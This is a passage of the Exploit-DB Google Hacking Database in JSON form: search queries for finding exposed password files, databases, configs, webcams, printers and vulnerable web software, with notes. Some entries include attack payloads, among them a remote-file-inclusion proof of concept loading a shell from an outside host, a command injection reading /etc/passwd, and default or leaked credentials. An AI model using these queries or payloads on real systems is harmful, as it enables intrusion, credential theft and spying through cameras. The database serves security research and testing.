        "shortDescription": "intitle:\"Index of\" passwords modified", 
        "textualDescription": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using \"intitle\" and an extra keyword from the index page (in this case modified)."
    }, 
    {
        "signatureReferenceNumber": "337", 
        "link": "https://www.exploit-db.com/ghdb/337/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=inurl:index.of.password&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&", 
        "shortDescription": "index.of.password", 
        "textualDescription": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380"
    }, 
    {
        "signatureReferenceNumber": "338", 
        "link": "https://www.exploit-db.com/ghdb/338/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22powered+by+webcamXP%22+%22Pro%7CBroadcast%22&btnG=Search", 
        "shortDescription": "\"powered by webcamXP\" \"Pro|Broadcast\"", 
        "textualDescription": "webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online."
    }, 
    {
        "signatureReferenceNumber": "339", 
        "link": "https://www.exploit-db.com/ghdb/339/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+sphider%22+-exploit+-ihackstuff+-www.cs.ioc.ee", 
        "shortDescription": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", 
        "textualDescription": "dork: \"powered by sphider\" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/"
    }, 
    {
        "signatureReferenceNumber": "340", 
        "link": "https://www.exploit-db.com/ghdb/340/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&q=%22by+Reimar+Hoven.+All+Rights+Reserved.+Disclaimer%22+%7C+inurl%3A%22log%2Flogdb.dta%22+&btnG=Cerca+con+Google&meta=&num=100&filter=0", 
        "shortDescription": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", 
        "textualDescription": "dork: \"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\" this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs"
    }, 
    {
        "signatureReferenceNumber": "341", 
        "link": "https://www.exploit-db.com/ghdb/341/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22ORA-12541:+TNS:no+listener%22+intitle:%22error+occurred%22&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", 
        "textualDescription": "In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources."
    }, 
    {
        "signatureReferenceNumber": "342", 
        "link": "https://www.exploit-db.com/ghdb/342/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22&btnG=Google+Search", 
        "shortDescription": "intitle:\"Live View / - AXIS\"", 
        "textualDescription": "These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ): \"By default, the username will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201croot\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2 and the password will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2. If these are not the current values, performing a factory default on the unit will reset the password to \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.\"Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x"
    }, 
    {
        "signatureReferenceNumber": "343", 
        "link": "https://www.exploit-db.com/ghdb/343/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=%22sets+mode:+%2Bp%22&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"sets mode: +p\"", 
        "textualDescription": "This search reveals private channels on IRC as revealed by IRC chat logs."
    }, 
    {
        "signatureReferenceNumber": "344", 
        "link": "https://www.exploit-db.com/ghdb/344/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=%22sets+mode:+%2Bk%22&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"sets mode: +k\"", 
        "textualDescription": "This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs."
    }, 
    {
        "signatureReferenceNumber": "345", 
        "link": "https://www.exploit-db.com/ghdb/345/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=%22sets+mode:+%2Bs%22&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"sets mode: +s\"", 
        "textualDescription": "This search reveals secret channels on IRC as revealed by IRC chat logs."
    }, 
    {
        "signatureReferenceNumber": "346", 
        "link": "https://www.exploit-db.com/ghdb/346/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22BorderManager+Information+alert%22&btnG=Search", 
        "shortDescription": "intitle:\"BorderManager Information alert\"", 
        "textualDescription": "This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query."
    }, 
    {
        "signatureReferenceNumber": "347", 
        "link": "https://www.exploit-db.com/ghdb/347/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?&q=%22AnWeb%2f%31%2e%34%32h%22+intitle%3aindex%2eof", 
        "shortDescription": "\"AnWeb/1.42h\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "348", 
        "link": "https://www.exploit-db.com/ghdb/348/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=%22CERN+httpd+3.0B+(VAX+VMS)%22&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"CERN httpd 3.0B (VAX VMS)\"", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "349", 
        "link": "https://www.exploit-db.com/ghdb/349/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22JRun+Web+Server%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"JRun Web Server\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "350", 
        "link": "https://www.exploit-db.com/ghdb/350/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22MaXX%2F3.1%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"MaXX/3.1\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "351", 
        "link": "https://www.exploit-db.com/ghdb/351/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F*+server+at%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"Microsoft-IIS/* server at\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "352", 
        "link": "https://www.exploit-db.com/ghdb/352/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F4.0%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"Microsoft-IIS/4.0\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "353", 
        "link": "https://www.exploit-db.com/ghdb/353/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F5.0+server+at%22&btnG=Search", 
        "shortDescription": "\"Microsoft-IIS/5.0 server at\"", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "354", 
        "link": "https://www.exploit-db.com/ghdb/354/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F6.0%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"Microsoft-IIS/6.0\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "355", 
        "link": "https://www.exploit-db.com/ghdb/355/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22OmniHTTPd%2F2.10%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"OmniHTTPd/2.10\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "356", 
        "link": "https://www.exploit-db.com/ghdb/356/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22OpenSA%2F1.0.4%22+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"OpenSA/1.0.4\" intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "357", 
        "link": "https://www.exploit-db.com/ghdb/357/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Red+Hat+Secure%2F2.0%22&btnG=Search", 
        "shortDescription": "\"Red Hat Secure/2.0\"", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "358", 
        "link": "https://www.exploit-db.com/ghdb/358/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Red+Hat+Secure%2F3.0+server+at%22&btnG=Search", 
        "shortDescription": "\"Red Hat Secure/3.0 server at\"", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "359", 
        "link": "https://www.exploit-db.com/ghdb/359/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=SEDWebserver+*+server+%2Bat+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "sEDWebserver * server +at intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "360", 
        "link": "https://www.exploit-db.com/ghdb/360/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=fitweb-wwws+*+server+at+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "fitweb-wwws * server at intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "361", 
        "link": "https://www.exploit-db.com/ghdb/361/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22httpd%2Bssl%2Fkttd%22+*+server+at+intitle%3Aindex.of&btnG=Search", 
        "shortDescription": "\"httpd+ssl/kttd\" * server at intitle:index.of", 
        "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."
    }, 
    {
        "signatureReferenceNumber": "362", 
        "link": "https://www.exploit-db.com/ghdb/362/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Phaser+6250%22+%22Printer+Neighborhood%22+%22XEROX+CORPORATION%22&btnG=Search", 
        "shortDescription": "Xerox Phaser 6250", 
        "textualDescription": "Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&W (24ppm A4 Color/B&W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup.."
    }, 
    {
        "signatureReferenceNumber": "363", 
        "link": "https://www.exploit-db.com/ghdb/363/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Phaser%C2%AE+740+Color+Printer%22+%22printer+named%3A+%22&btnG=Search", 
        "shortDescription": "Xerox Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 740 Color Printer", 
        "textualDescription": "This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6250.Configuration pages are password protected."
    }, 
    {
        "signatureReferenceNumber": "364", 
        "link": "https://www.exploit-db.com/ghdb/364/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=%22Phaser+8200%22+%22%C2%A9+Xerox%22+%22refresh%22+%22+Email+Alerts%22&filter=0", 
        "shortDescription": "Xerox Phaser 8200", 
        "textualDescription": "Brochure info: \"The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.\" Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.\"Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use."
    }, 
    {
        "signatureReferenceNumber": "365", 
        "link": "https://www.exploit-db.com/ghdb/365/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=%22Phaser%C2%AE+840+Color+Printer%22+%22Current+Status%22+%22printer+named:%22", 
        "shortDescription": "Xerox Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer", 
        "textualDescription": "This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 8400This search finds the PhaserLinkTM Printer Management Software for the Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer. It seems at least the \"Print DEMO\" page works without authentication."
    }, 
    {
        "signatureReferenceNumber": "366", 
        "link": "https://www.exploit-db.com/ghdb/366/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22index+of%22+%2F+picasa.ini+&btnG=Google+Search", 
        "shortDescription": "\"index of\" / picasa.ini", 
        "textualDescription": "Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows the voyer to browse directories of photos uploaded using the picasa software."
    }, 
    {
        "signatureReferenceNumber": "367", 
        "link": "https://www.exploit-db.com/ghdb/367/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22adding+new+user%22+inurl%3Aaddnewuser+-%22there+are+no+domains%22&btnG=Search", 
        "shortDescription": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", 
        "textualDescription": "Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail)."
    }, 
    {
        "signatureReferenceNumber": "368", 
        "link": "https://www.exploit-db.com/ghdb/368/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&&q=intitle%3A%22index+of%22+%2Bmyd+%2Bsize&btnG=Search", 
        "shortDescription": "intitle:\"index of\" +myd size", 
        "textualDescription": "The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database."
    }, 
    {
        "signatureReferenceNumber": "369", 
        "link": "https://www.exploit-db.com/ghdb/369/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acnf+my.cnf+-cvs+-example&btnG=Search", 
        "shortDescription": "filetype:cnf my.cnf -cvs -example", 
        "textualDescription": "The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates)."
    }, 
    {
        "signatureReferenceNumber": "370", 
        "link": "https://www.exploit-db.com/ghdb/370/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=hAcxFtpScan&btnG=Google+Search", 
        "shortDescription": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", 
        "textualDescription": "hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it."
    }, 
    {
        "signatureReferenceNumber": "371", 
        "link": "https://www.exploit-db.com/ghdb/371/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aemail+filetype%3Amdb&btnG=Search", 
        "shortDescription": "inurl:email filetype:mdb", 
        "textualDescription": "Microsoft Access databases containing email information.."
    }, 
    {
        "signatureReferenceNumber": "372", 
        "link": "https://www.exploit-db.com/ghdb/372/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%2B%22Powered+by+INDEXU%22+inurl%3A%28browse%7Ctop_rated%7Cpower_search%7Chot%7Cbrowse%7Ccreate_admin_user%29+filetype%3Aphp&btnG=Sea", 
        "shortDescription": "Powered by INDEXU", 
        "textualDescription": "From the sales department: \"INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.\"(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. It has been reported that on (rare) occosions this page ->http://[indexu server]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL tohttp://[target]/admin/index.php and enter:user=adminpass=adminBut that's if you find them.."
    }, 
    {
        "signatureReferenceNumber": "373", 
        "link": "https://www.exploit-db.com/ghdb/373/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=data+filetype%3Amdb+-site%3Agov+-site%3Amil&btnG=Search", 
        "shortDescription": "data filetype:mdb -site:gov -site:mil", 
        "textualDescription": "Microsoft Access databases containing all kinds of 'data'."
    }, 
    {
        "signatureReferenceNumber": "374", 
        "link": "https://www.exploit-db.com/ghdb/374/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Abackup+filetype%3Amdb&btnG=Search", 
        "shortDescription": "inurl:backup filetype:mdb", 
        "textualDescription": "Microsoft Access database backups.."
    }, 
    {
        "signatureReferenceNumber": "375", 
        "link": "https://www.exploit-db.com/ghdb/375/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aforum+filetype%3Amdb&btnG=Search", 
        "shortDescription": "inurl:forum filetype:mdb", 
        "textualDescription": "Microsoft Access databases containing 'forum' information .."
    }, 
    {
        "signatureReferenceNumber": "376", 
        "link": "https://www.exploit-db.com/ghdb/376/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+Of%22+cookies.txt+%22size%22&btnG=Search", 
        "shortDescription": "intitle:\"Index Of\" cookies.txt size", 
        "textualDescription": "searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits."
    }, 
    {
        "signatureReferenceNumber": "377", 
        "link": "https://www.exploit-db.com/ghdb/377/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=intext:(password+%7C+passcode)+intext:(username+%7C+userid+%7C+user)+++filetype:csv&hl=en&lr=&ie=UTF-8&start=0&sa=N", 
        "shortDescription": "intext:(password | passcode) intext:(username | userid | user)   filetype:csv", 
        "textualDescription": "CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker.."
    }, 
    {
        "signatureReferenceNumber": "378", 
        "link": "https://www.exploit-db.com/ghdb/378/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aprofiles+filetype%3Amdb&btnG=Search", 
        "shortDescription": "inurl:profiles filetype:mdb", 
        "textualDescription": "Microsoft Access databases containing (user) profiles .."
    }, 
    {
        "signatureReferenceNumber": "379", 
        "link": "https://www.exploit-db.com/ghdb/379/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Acgi+inurl%3A%22Web_Store.cgi%22&btnG=Google+Search", 
        "shortDescription": "filetype:cgi inurl:\"Web_Store.cgi\"", 
        "textualDescription": "Zero X reported that \"Web_Store.cgi\" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point."
    }, 
    {
        "signatureReferenceNumber": "380", 
        "link": "https://www.exploit-db.com/ghdb/380/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=ASP.login_aspx+%22ASP.NET_SessionId%22&btnG=Search", 
        "shortDescription": "ASP.login_aspx \"ASP.NET_SessionId\"", 
        "textualDescription": ".NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version."
    }, 
    {
        "signatureReferenceNumber": "381", 
        "link": "https://www.exploit-db.com/ghdb/381/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22ASP.NET_SessionId%22+%22data+source%3D%22&btnG=Search", 
        "shortDescription": "\"ASP.NET_SessionId\" \"data source=\"", 
        "textualDescription": ".NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:strConn\tSystem.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage:  It will not suprise the experienced security digger that these files are often in a downloadeble location on the server."
    }, 
    {
        "signatureReferenceNumber": "382", 
        "link": "https://www.exploit-db.com/ghdb/382/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Novell%2C+Inc%22+WEBACCESS+Username+Password+%22Version+*.*%22+Copyright++-inurl%3Ahelp+-guides%7Cguide&btnG=Search", 
        "shortDescription": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright  -inurl:help -guides|guide", 
        "textualDescription": "This may be used to find Novell Grouwise Webaccess servers."
    }, 
    {
        "signatureReferenceNumber": "383", 
        "link": "https://www.exploit-db.com/ghdb/383/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=ext%3Apwd+inurl%3A%28service+%7C+authors+%7C+administrators+%7C+users%29+%22%23+-FrontPage-%22", 
        "shortDescription": "\"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd", 
        "textualDescription": "Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !"
    }, 
    {
        "signatureReferenceNumber": "384", 
        "link": "https://www.exploit-db.com/ghdb/384/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acgi+inurl%3A%22fileman.cgi%22&btnG=Search", 
        "shortDescription": "filetype:cgi inurl:\"fileman.cgi\"", 
        "textualDescription": "This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a \"simple\" but \"cost effective\" way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected \"fileman.log\" logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. (think hours not seconds)."
    }, 
    {
        "signatureReferenceNumber": "385", 
        "link": "https://www.exploit-db.com/ghdb/385/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Index+Of%22+-inurl%3Amaillog++maillog+size", 
        "shortDescription": "intitle:\"Index Of\" -inurl:maillog  maillog size", 
        "textualDescription": "This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server."
    }, 
    {
        "signatureReferenceNumber": "386", 
        "link": "https://www.exploit-db.com/ghdb/386/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle%3Aliveapplet+inurl%3ALvAppl", 
        "shortDescription": "Canon Webview netcams", 
        "textualDescription": "Canon has a series of netcams that all use the \"WebView LiveScope\" software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called \"LiveApplet\" that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi"
    }, 
    {
        "signatureReferenceNumber": "387", 
        "link": "https://www.exploit-db.com/ghdb/387/", 
        "category": "Vulnerable Servers", 
